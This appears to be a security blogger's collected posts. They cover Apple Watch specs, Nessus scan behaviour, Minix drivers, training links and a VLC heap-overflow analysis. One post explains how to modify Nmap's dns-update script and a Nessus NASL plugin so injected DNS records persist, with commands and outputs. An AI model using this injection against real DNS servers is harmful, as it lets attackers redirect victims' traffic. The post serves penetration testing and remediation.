Released September 21, 2018 - The ‘Series 4’ introduced larger, rounded, edge-to-edge screens as well as the ability to perform electrocardiogram (ECG) measurements. An improved accelerometer and gyroscope brought “fall detection” to the device. [Health Release]

Display sizes 40mm and 44mm
ECG - Electrical heart sensor
Fall detection via improved accelerometer (32-g) and gyroscope
LTPO OLED Retina display
Apple 64-bit S4 SiP
GPS (GALILEO, QZSS)
Bluetooth 5.0
Microphone moved to support better call quality
50% Louder speaker
Haptic feedback in Digital Crown
1 GB RAM
2nd-generation optical heart sensor
Cellular models now sport a more-subtle red ring on Digital Crown
W3 wireless chip
Edition: NONE Available

Series 5

Released September 20 2019 - The ‘Series 5’ brought a much requested feature in the “always-on display” as well as a Magnetometer/compass.

Always on display
Magnetometer w/ compass function
Apple S5 SiP
Improved ambient light sensor
Capacity 32GB
GPS (GNSS)
Edition: Titanium

Series 6

Released September 18, 2020 - The ‘Series 6’ primary focus was the blood oxygen sensor suite supporting Apple’s continued push into health.

Blood oxygen sensors (SpO2 / VO2max)
Real-time/always on altimeter
U1 ultra wideband locator chip
Force Touch has been removed from the display
Apple S6 SiP
Dual-band WiFi (802.11 b/g/n 2.4GHz and 5GHz)
Larger Taptic Engine
3rd-generation optical heart sensor

Series 7

Announced September 14, 2021 - The ‘Series 7’ introduces new structural geometry which supports a larger overall display and a more durable design.

Larger display (40% smaller bezels, 20% larger screen) | 41mm and 45mm
Updated screen geometry (improved crack resistance, 50% thicker front crystal, rounder corners)
70% brighter passive always-on display
Dust resistance w/ IP6X certification
Apple S7 SiP
33% faster charging
GPS (BeiDou)
Dual-band WiFi (802.11b/g/n 2.4GHz and 5 GHz Wi-Fi)
Edition: Titanium

Series 8

Announced September 7, 2022 - The ‘Series 8’ is a light update over the previous generation, introducing body temperature sensors and an improved gyroscope.

Temperature sensors (2)
High dynamic range 3-axis gyroscope (facilitates the Crash Detection feature)
Apple S8 SiP
High-g accelerometer (256-g)
Bluetooth 5.3

Ultra*

Announced September 7, 2022 - The Apple Watch ‘Ultra’ is an entirely new line of Apple Watch, one that is meant for more extreme workouts and extreme environments. It improves on nearly every aspect of the watch and does so in a form factor that is far more rugged, and more sizable.

Titanium casing
New body design (Flat screen, display edge protection, larger digital crown, crown guard, larger side button, etc…)
Larger 49mm case
Dual-frequency GPS (L1 and L5)
Vastly improved battery life (~36 hours | ~60 hours on low power mode)
100m Water resistance, MIL-STD 810H³, EN13319 certified
2000 nits brightness
Action button (orange)
Dual speakers (40% louder)
Siren (audible up to 600 feet)
Three-Microphone array with beamforming
Depth gauge (40m/130ft)
Water temperature sensor

* My current Apple Watch is the Apple Watch Ultra.

Series 9 & Ultra 2

Announced September 12, 2023 - The ‘Series 9’ features a new double-tap interaction method and a brighter display.

Apple S9 SiP (5.6 bil transistors | +60% over last gen, enables double tap gesture) | 4-core Neural Engine
2x brighter display (up to 2000 nits, dims to 1 nit)
2nd-generation Ultra Wideband chip (U2)
WiFi 4 802.11n
Up to 64 GB SSD storage (Ultra 2)
Up to 3000 nits brightness (Ultra 2)

References

Nessus is Lying to Us [Updated]

Thu, 20 Aug 2020 10:50:00 -0400

Part of any Vulnerability Management (VM) program is comprehensive, fast Host Discovery scans. Recently, I decided to take a closer look at the discovery scans configured within my organizations Tenable.sc instance with the goal of improving the speed and efficiency by which the scans would run. Here’s what everything looked like after some tweaking…

UPDATE [9/25/2020]: An engineer from Tenable happened across this post and reached out to clarify some of the seemingly peculiar behavior described in the original post. First, on the topic of why Nessus scans ports you haven’t explicitly targeted - Essentially, according to Tenable, it really can’t be avoided. I pretty much knew this as I had previously found the built-in config file specifying ping methods and port targets. What I found more illuminating was that Nessus has a Ping hierarchy where basically, it will try certain ping methods first and if they are successful, will NOT attempt subsequent ping methods. This answers why in cases where i specified certain ports be “pinged”, they were not actually targeted. This is because I had successful pings that preceded it, thus rendering pinging the arbitrary points unnecessary. Basically the point of the “Ping” portion of a Nessus scan is to find ONE piece of evidence a host is live rather than see all the ways a host is live. So Nessus may not in-fact be “lying” to us after all, but that doesnt make it any less confusing =). ...End of Update

I got the scan policy whittled down to just two plugins, the FQDN plugin (12053) and the standard “Nessus Scan Information” plugin (19506).

I then disabled all port scanning and service discovery switches.

Finally I disabled ARP and UDP ping methods in the “Host Discovery” tab of the scan policy, leaving only ICMP and TCP ping switches on (with TCP ping Destination ports of 22,80,135,139,443,445 and 1337) as shown below…

*The TCP ping port 1337 has been included here for demonstration purposes.

I then logged into the cli for the Nessus scanner which would be sending the scan traffic, started a network capture and observed what traffic this very lightweight policy would send. My expectation of course, was that it would send exactly what I told it to - an ICMP ping as well as TCP pings to the specified ports. Instead, I got the following…

Network Capture w/ TCP Pings ENABLED

Ok, so a couple observations… First, and most obviously, a lot more traffic was sent than I expected, including to ports I did not explicitly set. This seemed a bit strange, but after some research I found that Nessus has a built-in set of ports it uses for its TCP Ping Methods. Typically, this port-set is requested by inputting ‘default’ in the TCP destination ports for the “Ping Methods” section of the “Host Discovery” tab in the Nessus scan policy (…inhales…). However, I did not specify ‘default’, rather I put my own custom range in. Clearly Nessus is ignoring me here. Now the second, and more frustrating observation is that I don’t actually see the syn packet to my ‘1337’ port either!

Alright, so let’s move on from the TCP Ping switch. Let’s observe the behavior when this switch is disabled completely…

Network Capture w/ TCP Pings DISABLED

…
… … …
Interesting…
…

So even with TCP ping off, Nessus goes right ahead and tries to initiate some handshakes with a bunch of ports that look suspiciously like the ‘default’ ports from before (also known as ping_host4.inc file located on the Nessus box).

At this point I gave up trying to convince the Nessus policy to obey me. But I was still curious, what would happen if I disabled everything, and I mean EVERYTHING in the policy. I toggled every switch, even disabling ICMP pings. I turned off all plugins. I shut it all down. I then ran the scan… No change in behavior.

Suffice it to say, Nessus is lying to us.

DNS Record Injection using Nmap and Nessus

Mon, 16 Dec 2019 09:50:00 -0500

On a penetration test or as a result of a vulnerability scan you may encounter a “DNS Server Dynamic Update Record Injection” finding. Nessus for example, is one such vulnerability scanner that can identify this issue. This vulnerability allows anyone with access to the afflicted DNS server (over UDP port 53) the ability to add or even remove DNS records to/from a zone. The danger of this vulnerability, put simply by the Nessus plugin itself is… “This protocol … could be subverted by malicious users to redirect network traffic.”

OK, so Nessus has identified the vulnerability - great! As a penetration tester, you may be interested in exploring that vulnerability further. Let’s start digging into this by taking a closer look at the Nessus plugin itself. When found, the Nessus plugin will output… “Nessus was able to register a new A record into the following zone: [ZONE]”. This is an interesting message as it expresses that Nessus was actually able to ADD a record. What is unclear is whether that record was subsequently deleted or what the record details were (e.g. hostname, IP, etc…) Without more control over how the Nessus plugin is executed we may not be able to take advantage of it for our malicious purposes. Instead, let’s take a look at Nmap and see if it has anything we can use…

Nmap Arsenal

It turns out Nmap has functionality very similar to the DNS Server Dynamic Update Record Injection plugin from Nessus. With a standard install, Nmap contains a suite of NSE scripts (in /usr/share/nmap/scripts on Kali), one of which is named dns-update.nse. When the dns-update.nse script is run against the vulnerable DNS server the output specifies that a record is successfully added and then subsequently deleted. (Syntax for running the NSE script and the output is shown below).

nmap -sU -p 53 --script=dns-update --script-args=dns-update.hostname=[new hostname],dns-update.ip=[new ip] [DNS server ip]

PORT   STATE SERVICE
53/udp open  domain
| dns-update:
|   Successfully added the record "nmap-test.cqure.net"
|_  Successfully deleted the record "nmap-test.cqure.net"

Similar to the Nessus plugin, this NSE script can add a record to the zone but unlike the Nessus plugin, this script also lets us know what the hostname value of the record was and lets us know that the record was ALSO deleted. With this information in hand, let’s peek into the NSE script code and see if we can’t get a better idea of what it is doing and how we might modify it to add a record of our choosing.

After a closer inspection, I found that by commenting out a few lines of code in the NSE script I could remove the logic which deletes the A record after it had been added. The code to comment out is shown below…

...
local status, err = dns.update( name, { host=host, port=port, dtype="A", data=ip } )

if ( status ) then
    local result = {}
    table.insert(result, ("Successfully added the record \"%s\""):format(name))
    --local status = dns.update( name, { host=host, port=port, dtype="A", data="", ttl=0 } )
    --if ( status ) then
    --  table.insert(result, ("Successfully deleted the record \"%s\""):format(name))
    --else
      table.insert(result, ("Failed to delete the record \"%s\""):format(name))
...

So now, by re-running the script “nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=[new hostname],dns-update.ip=[new ip] [DNS server ip]” you will be able to add a hostname without having that hostname deleted afterwards. This can be further verified using the nslookup command…

Setting DNS server to use in interactive Nslookup prompt…

# nslookup
> server [DNS server ip - for example 10.10.10.10]
Default server: 10.10.10.10
Address: 10.10.10.10#53

Before running the NSE script exploit, the record you wish to inject will not be present.

> [hostname].[zone]
Server:   10.10.10.10
Address:  10.10.10.10#53

*** server can't find test.zone: SERVFAIL

After running the NSE script exploit you will see your injected record successfully resolves.

> [hostname].[zone]
Server:   10.10.10.10
Address:  10.10.10.10#53

Name:     test.zone
Address:  127.1.2.3

From here, you can being subsequent exploitation by having traffic routed to a domain of your choosing!

Weaponizing Nessus

With just a little bit of know-how, it is also possible to modify the Nessus plugin in a similar way to how we modified the Nmap NSE script to achieve the DNS record injection.

First, on a box with Nessus installed, list all plugins (stored in /opt/nessus/lib/nessus/plugins) and then search for the plugin ID (which is 35372).

ls /opt/nessus/lib/nessus/plugins | grep -iR "script_id(35372)"

dns_dyn_update.nasl: script_id(35372)

Here you’ll see one result - “dns_dyn_update.nasl”. The Nessus Attack Scripting Language or NASL files are Nessus’ way of running its respective plugins. Taking a closer look at this file, I identified just a few code modifications needed to allow me to add a DNS record of my choosing without it being deleted afterwards. These code modifications are shown below…

To add a hostname record, modify the following portions of code. (I recommend making a copy of the NASL file before modifying.)

...
pkt += raw_string(
  0, 4,             # Data length
  [ip separated by commas - 127, 1, 2, 3]); #Square brackets are not part of the code
return pkt;
...
dynname = "[hostname]";
...
#pkt = dns_update_A(zone: zone, dynname, delete: 1);  #COMMENT THIS LINE OUT
#send(socket:soc, data: pkt);                         #COMMENT THIS LINE OUT
...

Once the code has been modified, the script can be run directly using the nasl utility included with the Nessus install.

/opt/nessus/bin/nasl -t [target DNS server] /opt/nessus/lib/nessus/plugins/dns_dyn_update.nasl -M

==========[ Executing dns_server.nasl ]======
dns_server.nasl: Success
dns_server.nasl: Success
----------[ Finished dns_server.nasl 16msec ]------
==========[Executing bind_hostname.nasl ]======
----------[ Finished bind_hostname.nasl 13msec ]------
==========[Executing /opt/nessus/lib/nessus/plugins/dns_dyn_update.nasl]======

Nessus was able to register a new A record into the following zone :

[hostname.zone]

----------[ Finished /opt/nessus/lib/nessus/plugins/dns_dyn_update.nasl 17msec ]------

To then delete a hostname record simply uncomment the previously commented lines and re-run the NASL script…

#pkt = dns_update_A(zone: zone, dynname, delete: 1);
#send(socket:soc, data: pkt);

Closing Thoughts

As you can see, Nmap and Nessus definitely have some offensive capability which extends past your typical recon/enumeration/vulnerability scanning typically thought of when considering these two tools. With over 100k plugins/NASL files provided in Nessus (of course not all of which are “exploitable”) and another 590 NSE scripts which come with Nmap, there is a lot of potential for leveraging pre-built exploits for your own work.
Despite Tenable claiming (via it’s Security Center product) that there is no exploit available for this vulnerability, you now know that there definitely is. What’s funny here is Nessus states that it was able to exploit the vulnerability and then proceeds to claim that there is no exploit.
Update your DNS servers if you find this vulnerability! Tenable classifies this as a Medium risk issue though I personally think this is High risk.

Thanks for reading!

Online IT/Security Training

Fri, 13 Dec 2019 09:50:00 -0500

Getting into information security as a newcomer or keeping your skills up-to-date as an existing security practitioner can be difficult. Fear not! There is a TON of practical, online training and learning resources available. See for yourself below…

For more training resources check out this awesome list of free training or DFIR DIVA’s Free & Affordable Training list.

Jump to Section

Large Training Platforms
Intro to Security
Web Application & Bug Bounty
Penetration Testing & Red Teaming
OSINT
Blue Team
Cloud
Mobile
Container
Exploit Dev / RE
AI
Web3
Vulnerability Management
Programming
Other

Large Training Platforms

Coursera [FREE/PAID]
Cybrary [PAID]
edX [FREE/PAID]
Immersive Labs - Students’ Digital Cyber Academy [FREE]
Linkedin Learning [PAID]
The Linux Foundation [PAID]
Open Security Training [FREE]
Open Security Training 2 [FREE]
Pluralsight [PAID]
Udemy [PAID]

Intro to Security

FIRST Learning Platform
Future Learn - Introduction to Cyber Security [PAID]
picoCTF [FREE]
pwn.college [FREE]
SANS Cyber Aces [FREE]
Springboard [FREE]

Web Application & Bug Bounty

Alert to Win [FREE]
APIsec University [FREE/PAID]
Automated Testing Handbook [FREE]
BugBountyHunter | zseano [PAID]
Bugcrowd University [FREE]
BugHuntr.io [FREE/PAID]
Capture The Flag | Google [FREE]
CI/CD Goat [FREE]
CTF Challenge [FREE]
CTF Time [FREE]
CTFlearn [FREE]
Defend the Web [FREE]
Google Gruyere [FREE]
Hack This Site [FREE]
hacker101 [FREE]
Hacksplaining [FREE]
Intigrity Hackademy [FREE]
Komodo Application Security Challenge [FREE]
OWASP Education/Free Training [FREE]
OWASP Juice Shop [FREE]
PentesterLab [FREE/PAID]
Root in Jail [FREE]
snyk Learn [FREE]
Web Security Academy [FREE]
WrongSecrets [FREE]
XSS game [FREE]

Penetration Testing & Red Teaming

archive.ooo [FREE]
AttackDefense [PAID]
AttackIQ [FREE]
Cobalt Strike Training [PAID]
Cyber Plumber Lab [PAID]
DEF CON CTFs [FREE]
Evilzone [FREE]
GreyCampus Ethical Hacking [FREE/PAID]
Hack The Box [FREE/PAID]
Hack The Box Academy [FREE/PAID]
The Hacking Games [PAID]
Hacking-Lab [FREE/PAID]
Hacktivate [FREE]
Holiday Hack Challenge [FREE]
IppSec - YouTube [FREE]
Kali Linux Revealed [FREE]
Metasploit Unleashed [FREE]
NYU OSIRIS Lab Recruit Challenges [FREE]
OffSec Proving Grounds [FREE/PAID]
OverTheWire [FREE]
Parrot CTFs [FREE]
Penetration Testing Practice Lab - Vulnerable Apps / Systems [FREE]
Pentester Academy [PAID]
PentestGround [FREE]
PWN.TN [FREE]
Red Team Sorcery [FREE]
Root Me [FREE/PAID]
SlayerLabs [PAID]
TCM Security Academy [PAID]
Try Hack Me [FREE]
VulnHub [FREE]
VulnLab [PAID]
VulnMachines [FREE]
W3Challs [FREE]
We Chall [FREE]

OSINT

CyberSoc | Cyber Investigator CTF [FREE]
Maveris Digital Marathon OSINT CTF [FREE]
MilOsintCTF [FREE]
MyOsint - Using Commandline OSINT Tools Introduction [PAID]
OSINT Dojo [FREE]
OSINT Games [FREE]
OSINT ME - various things
SampleCTF [FREE]
Search Party | TraceLabs [FREE]
Sourcing.Games [FREE]
The Insider Threat CTF [FREE]
Tiberian Order [FREE]

Blue Team (Forensics, Threat Hunting, SOC, etc…)

Cloud

AWSGoat [FREE]
AWS Training [FREE/PAID]
AzureGoat [FREE]
GCPGoat [FREE]
Azure Training [FREE/PAID]
Google Cloud Training [FREE/PAID]
A Cloud Guru [PAID]
CloudGoat [FREE]
FedVTE Cloud Computing Security [FREE]
flAWS [FREE]
flAWS 2 [FREE]
H4CK1NG G00GL3 [FREE]
Purple Cloud [FREE]
TerraGoat [FREE]

Mobile

Android App Reverse Engineering 101 [FREE]
Maddie Stone Workshops [FREE]

Container

Bad Pods [FREE]
EKS Cluster Games [FREE]
K8S Lan Party [FREE]
kCTF [FREE]
Kubernetes Goat [FREE]

Exploit Development / Reverse Engineering / Malware Analysis

Awesome Malware Analysis [FREE]
Azeria Labs [FREE]
Calypso Labs [PAID]
Corelan Team [FREE]
Crackmes [FREE]
Emulate to Exploitate [FREE]
exploit.education [FREE]
FLARE Learning Hub [FREE]
FLARE On Challenge [FREE]
Ghidra Golf [FREE]
MalDev Academy [PAID]
Malware Unicorn Workshops [FREE]
Malware-Traffic-Analysis.net [FREE]
Nightmare [FREE]
obfuscator.re [FREE]
Offensive Software Exploitation Course [FREE]
Pawnyable [FREE]
pwnable.kr [FREE]
pwnable.tw [FREE]
Reverse Engineering Course [FREE]
Reversing Hero [FREE]
Smash The Stack [FREE]
#TODO [FREE/PAID]
Vitali Kremez - Let’s Learn [FREE]

AI

Web3

Damn Vulnerable DeFi
Multiversity [FREE]

Vulnerability Management

Qualys Community [FREE | Offers Free Certs]
Tenable University [FREE | Offers Free Certs]

Programming

codeacademy [FREE]
Eloquent JavaScript [FREE]
Getting Git Right [FREE]
HackerRank [FREE/PAID]
Invent with Python [FREE/PAID]
LeetCode [PAID]
Practical Python Programming [FREE]
Project Euler [FREE]
The Python Tutorial [FREE]
Rubyfu [FREE]
TwilioQuest [FREE]
w3schools [FREE]

General / Other

The Big IAM Challenge [FREE]
Cal Poly Security Training Material [FREE]
CLARK [FREE]
Command Challenge [FREE]
Crypto101 [FREE]
cryptobook [FREE]
Cryptohack [FREE]
Cryptopals [FREE]
DoD Cyber Exchange Public [FREE]
ENISA [FREE]
Federal Virtual Training Environment (FedVTE) [FREE (for government personnel and veterans)]
FedVTE [FREE]
Khan Academy - Encryption [FREE]
Learn and Test DMARC [FREE]
mess with dns [FREE]
MIT Open Courseware - Network and Computer Security [FREE]
NDG Online Courses & Labs [FREE/PAID]
NICCS [FREE]
SadServers [FREE]
SEED Labs [FREE]
telehack [FREE]
trainsec [PAID]
try to decrypt [FREE]
Wargame Nexus

A Method for Web Security Policies (security.txt)

Fri, 13 Dec 2019 09:50:00 -0500

The Internet Engineering Steering Group (IESG) is set to release a web security policy standard, the goal of which is to simplify the vulnerability disclosure process. This proposal, dubbed “A Method for Web Security Policies”, specifies a standardized file (similar to that of robots.txt or humans.txt) named security.txt. This file will give security researchers (or anyone with a security concern to report) an easy way to learn about a site’s disclosure process or contact those responsible for site security. Primary information included in this file includes contact information, public keys for encrypted communication, acknowledgements for previous researchers and more.

For more information on the draft RFC or to create a security.txt file of your own, please reference the project website.

Update: 5 years after work began for security.txt, RFC 9116 has now officially been published!

More on security.txt

I think this is a great addition to the Internet at large and should prove very beneficial to security researchers. Having created one of my own, I have some additional thoughts/tips if you decide to create one for yourself.

I like the idea of having a directive that quickly summarizes what level of “consent” your site has with respect to vulnerability testing. For example, if you don’t authorize testing of any kind, you could specify this. Or, if your site has an open or by-invite-only bug-bounty program, you could specify that instead. For example, the directive/value pair Testing-Consent: None could be used to express this information. Note: This directive is not one of the current standard directives contained in the draft RFC (but perhaps I will submit my own comment).
For the Encryption directive, I use gpg (GnuPG) to create a public/private key pair and serve the public key directly from my site.
To combat potential tampering of security.txt, it is recommended to digitally sign the file. Security researchers should verify this signature prior to using any information contained within (see Section 6.1 of Draft RFC). With this in mind, I recommend to not serve both the public key and the security.txt signature from your site since in the event of a compromise, it would be trivial for an attacker to modify both of these files such that the signature would appear to be valid.
I’ve also included an additional non-standard directive in my own security.txt file which specifies the date the security.txt file was last updated. Last-Updated would include just a simple date value (e.g. 12/13/2019).

Tips for Using gnupg

A few tips for creating your own signature files and validating the one I have provided in my security.txt file. ¹

Generate an OpenPGP Key

gpg --gen-key

Export public key

gpg --export -a --ouput [file] user@email.com

Create a digital signature

gpg -u user@email.com --output security.txt.sig --armor --detach-sig security.txt

Verify a digitally signed file.

gpg --verify security.txt.sig security.txt

Exploring Minix Character Device Drivers

Fri, 18 Oct 2019 10:50:00 -0400

This article is a continuation of what is covered in the Programming Device Drivers in Minix post found on the official Minix 3 wiki. That post is an introduction to programming device drivers on Minix in C. Device drivers are, in short, software programs that control hardware devices. Minix, as described by the Minix homepage, is a free, open-source, operating system designed to be highly reliable, flexible and secure. Minix is certainly not the only example of a micro-kernel design for an operating system but it does serve as an introduction to the world of micro-kernels.

Disclaimer: This exploratory topic is related to some graduate work I did while pursuing my Masters degree. I am by no means an expert in C programming nor Minix. With that said, there's not a lot of information out there on Minix so I hope this work can be valuable to others.

Minix Wiki Tutorial

Step 1 of course is to begin following the instructions detailed in the Programming Device Drivers in Minix tutorial. In that tutorial, you will create the driver directory, Makefile and driver file as well as setup the driver configuration file, start the driver service and create the character device. Rather than rehash all these steps (which are covered in great detail in that post), I will cover a few minor differences in my setup as well as a few slightly more advanced points.

Navigate to the Minix drivers directory /usr/src/minix/drivers/. Here, you can make a copy of the hello driver which was discussed in the Wiki post /usr/src/minix/drivers/examples/hello. In this folder you should see the Makefile, hello.c, header file and more (all of which was covered in the Minix wiki post). You do not need the .o, .h or .d files. You can rm them for now. From here, you can rename your hello.c file to whatever you want your device to be called (from here I will refer to this as [name]). Similarly, you will have to edit the contents of the Makefile, contents of the hello.c (now renamed to what you want) and the directory name of your driver replacing any instance of the word “hello” with your chosen name word [name].

After you’ve made these name-related changes, you can test the build by running…

make clean
make
make install

Unlike in the tutorial, rather than create a hello.conf in the driver’s directory itself, we instead put the configuration information in the more global /etc/system.conf directory/file. The configuration information for your driver can be the same as what was in the example ‘hello’ driver configuration. (In other words, you can copy exactly what is in this configuration file for the hello driver and put it at the end of the .conf file - but remember to change the name!).

Now, we can create the device file with the command…

mknod /dev/[name] c [major number] [minor number]

The major number and minor numbers are used by the system to associate the driver with the device. More information on these numbers can be read about here. Whats important is you choose a device number that is not already being used by an existing driver. You can see what device numbers are in used by running the command…

ls -l /dev | cut -d " " -f 11 | cut -d "," -f 1 | uniq | sort

The service can now be booted up by running…

service up /service/[name] -major [chosen major number]

The service can also be taken down with the command…

service down [name]

From here you should be able to read from the device driver. For example, issuing a cat /dev/[name] should let you read from the device. This is about where the Minix wiki tutorial finishes up.

Going a Bit Further…

The simple character device driver from the Minix tutorial includes function prototypes for opening, closing and reading from the device file. But what if you would like some additional functionality - say, writing to or controlling I/O to the file?

In the driver source there is an include file referencing <minix/chardriver.h> (this is a reference to /usr/include/minix/chardriver.h). This file contains the entry points for additional device dependent character driver function prototypes. This file includes not only open, close and read but also write, ioctl, cancel, select, intr, alarm and other. For now, we will cover adding both write and I/O control (ioctl) functionality to the driver.

Included below are the function prototypes covered by this tutorial (from /usr/include/minix/chardriver.h).

struct chardriver {
  int (*cdr_open)(devminor_t minor, int access, endpoint_t user_endpt);
  int (*cdr_close)(devminor_t minor);
  ssize_t (*cdr_read)(devminor_t minor, u64_t position, endpoint_t endpt, cp_grant_id_t grant, size_t size, int flags, cdev_id_t id);
  ssize_t (*cdr_write)(devminor_t minor, u64_t position, endpoint_t endpt, cp_grant_id_t grant, size_t size, int flags, cdev_id_t id);
  int (*cdr_ioctl)(devminor_t minor, unsigned long request, endpoint_t endpt, cp_grant_id_t grant, int flags, endpoint_t user_endpt, cdev_id_t id);

In your device driver code you will see these function prototypes initialized. You will notice of course that the write and ioctl functions are not included in the hello example driver. You must add these function declarations. This can be done by copying the declarations seen in the chardriver.h file described above into the driver source file. Note _*__ the name of the function should not be (*cdr_open) but rather a function name of your choice, such as _[name]_write.

Following the function prototype declarations, you will see some entry points into the driver, defined in struct chardriver. You will need to add some entry points for the other functions not defined in the original example hello driver. This includes the write and ioctl functions. Adding these to the chardriver struct can be seen below.

static struct chardriver [name]_tab =
{
    .cdr_open	= [name]_open,
    .cdr_close	= [name]_close,
    .cdr_read	= [name]_read,
    .cdr_write = [name]_write,
    .cdr_ioctl = [name]_ioctl,
};

read Function

As discussed in the Minix wiki post, the read function copies a string from the device driver program back to the calling user program by reading from the device file /dev/hello. This is done within the device driver primarily through the use of the sys_safecopyto function. The sys_safecopyto function reads size (which is a value passed to the read function as an argument) amount of bytes from the location pointed to by ptr and passes that back to the libc library read call which invoked it. In the code snippet below, whatever value is stored in int contents is passed back to the caller.

int contents;
...
static ssize_t [name]_read(devminor_t UNUSED(minor), u64_t position, endpoint_t endpt, cp_grant_id_t grant, size_t size, int UNUSED(flags), cdev_id_t UNUSED(id))
{
  int *ptr;
  int ret;
  ptr = contents;
  size = sizeof(ptr);
  if ((ret = sys_safecopyto(endpt, grant, 0, (vir_bytes) ptr, size)) != OK)
  {
    return ret;
  }
  return ret;
}

This read function is invoked from a user program such as the (simple) one included below. This program simply reads an integer out of the device file and displays it on the command line.

#include <stdio.h>
#inclue <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#define [NAME]_DEV "/dev/[name]"

int main (int argc, char *argv[]) {
  int data;
  fd = open([NAME]_DEV, O_RDWR);
  if (fd > 0)
    perror ("open"), exit(-1);
  if (read (fd, &data, sizeof(data)) < 0) {
    perror ("read")
    exit (1);
  }
  printf("%d\n", data)
  close (data);
  exit(0);
}

write Function

In the [name]_write function shown below, the reverse of sys_safecopyto is used - sys_safecopyfrom. This function is used to take data from the caller and write it into a value in the driver. The sys_safecopyfrom function writes size bytes from the calling libc library write function and writes it into the location pointed to by ptr. The [name]_write function code is shown below. In this case, an integer is being written from the calling function to the device file.

static ssize_t [name]_write(devminor_t UNUSED(minor), u64_t position, endpoint_t endpt, cp_grant_id_t grant, size_t size, int UNUSED(flags), cdev_id_t UNUSED(id))
{
  int ret;
  int value;
  int *ptr = &value;
  if ((ret = sys_safecopyfrom(endpt, grant, 0, (vir_bytes) ptr, size)) != OK)
  {
    return ret;
  }
  return sizeof(value);

An example of a C script which performs the libc library write call which calls the device driver write function and writes an integer to the device file is shown in the snippet below.

#include <stdio.h>
#inclue <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#define [NAME]_DEV "/dev/[name]"

int main (int argc, char *argv[]) {
  int data;
  fd = open([NAME]_DEV, O_RDWR);
  if (fd < 0)
    perror("open"), exit(-1);
  if (argc > 1)
  {
    data = atoi(argv[1]);
  }
  if (write (fd, &data, sizeof(data)) < 0) {
    perror ("write");
  }
  close(fd);
  exit(0);
}

ioctl function

Finally there is the ioctl function. ioctl is used to manipulate underlying device parameters of special files (i.e. device files).

To set up I/O control for this simple driver, we can create a header file (call it something like ioc_[name].h and place it in the /usr/include/sys/ directory). This file can later be referenced in your device driver file using #include <sys/ioc[name].h>_. In this file, you will define the different I/O control methods. For example, you could define three I/O control methods which control reading, writing and clearing a device file. This code is shown below…

#ifndef _S_I_[NAME]_H
#define _S_I_[NAME]_H
#include <minix/ioctl.h>
#define IOCREAD   _IOR('h', 3, u32_t)
#define IOCWRITE  _IOW('h', 4, u32_t)
#define IOCCLEAR  _IOW('h', 5, u32_t)
#endif

The file above has a single include, (<minix/ioctl.h) which contains only a single line which is another include, (<sys/ioccom.h>). ioccom.h contains the references for different types of I/O control definitions. The two definitions we will use (in our simple driver addition) are shown in the snippet below. It’s important to note that there are far more definitions which could be used in more advanced drivers.

#define _IOR(g,n,t)   _IOC(IOC_OUT,   (g), (n), sizeof(t))
#define _IOW(g,n,t)   _IOC(IOC_IN,   (g), (n), sizeof(t))

Now that we have the I/O header for our device driver, we can initialize the [name]_ioctl function in our driver file. The code snippet below is an example of how that would be done. The important function argument in the ioctl function is the unsigned long request parameter. This request value is the control value sent from the user program to the device driver which specifies which I/O control method is being invoked.

static int [name]_ioctl(dev_minor_t minor, unsigned long request, endpoint_t endpt, cp_grant_id_t grant, int flags, endpoint_t user_endpt, cdev_id_t id)
{  
  if(request==IOCREAD) {
    //Insert Functionality Here
  }
  if(request==IOCWRITE) {
    //Insert Functionality Here
  }
  if (request==IOCCLEAR) {
    //Insert Functionality Here
  }
  return -1
}

An example user program is provided in the snippet below… In this example, a single IOC call is made. It is up to you to figure out what you would like the different functionality to be!

#include <sys/types.h>
#include <sys/ioc_[name].h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#define [NAME]_DEV "/dev/[name]"

int main (int argc, char *argv[]) {
  int data;
  fd = open([NAME]_dev, O_RDWR);
  if (fd < 0)
    perror ("open"), exit(-1);
  if (ioctl (fd, [IOCREAD], &value) < 0)
    perror ("ioctl");
  close(fd);
  exit(0);
}

This was just a quick look at adding a bit more functionality to a device driver in Minix. Thanks for reading and feel free to contact me if there are any questions!

Heap Buffer Overflow in VLC v0.9.4

Tue, 08 Oct 2019 01:00:00 -0400

A previous post analyzed a stack buffer-overflow in the parse_master function of VLC <=v0.9.4. parse_master is susceptible to another vulnerability, this time of the heap-overflow variety.

* Following this analysis requires some understanding of Intel assembly and basic reverse engineering concepts.

Throughout the analysis below, portions of the ty.c source code are referenced using a bracketed "[1]" annotation. This source code and all annotations are provided at the bottom of the page. In most cases, code snippets are also provided directly below the paragraph where the code is referenced.

Explanation of Source Code

When VLC plays a .ty or any other file and encounters a certain sequence of bytes [13] it calls the parse_master function with p_demux as an argument [15]. p_demux is the remaining (unprocessed) bytes of the input video file. The peek function [14] compares the current 4 bytes in the input stream to the magic bytes [13] and then rewinds p_demux to the offset beginning with those same bytes (in other words, if the magic bytes are encountered, parse_master is passed the input stream (p_demux) starting with the offset of the magic bytes).

#define TIVO_PES_FILEID   ( 0xf5467abd ) [13]
...
/* check if it's a PART Header */
    if( U32_AT( &p_peek[ 0 ] ) == TIVO_PES_FILEID )	[14]
    {
        /* parse master chunk */
        parse_master(p_demux); [15]

As you can see in the image below, the byte stream begins with the magic bytes “F5 46 7a bd”.

The parse_master function begins with declaring a series of variables including an array of 32 8-bit integers (mst_buf) [1] as well as two 32-bit integers (i and i_map_size) [2]. Further down, there is a call to thhe stream_Read function which reads 32 bytes from the input stream into mst_buf [3]. The following line [4], sets i_map_size to the 32-bit value located at mst_buf[20]. The variable i is then initialized [6] to the 32-bit value at the end of the mst_buf buffer (mst_buf[28]). Finally, the i_seq_table_size data element in the p_sys structure is set to the result of the expression i / (8 + i_map_size) [7].

demux_sys_t *p_sys = p_demux->p_sys;
uint8_t mst_buf[32]; [1]
int i, i_map_size; [2]
...
stream_Read(p_demux->s, mst_buf, 32); [3]
i_map_size = U32_AT(&mst_buf[20]);  /* size of bitmask, in bytes */[4]
p_sys->i_bits_per_seq_entry = i_map_size * 8;
i = U32_AT(&mst_buf[28]);   /* size of SEQ table, in bytes */	[6]
p_sys->i_seq_table_size = i / (8 + i_map_size);	[7]

After these initial variables are initialized, a malloc call is made [8] with the size argument passed as i_seq_table_size * sizeof(ty_seq_table_t) (the size of the ty_seq_table_t data element is 16). The resulting memory pointer is stored in seq_table.

p_sys->seq_table = malloc(p_sys->i_seq_table_size * sizeof(ty_seq_table_t)); [8]

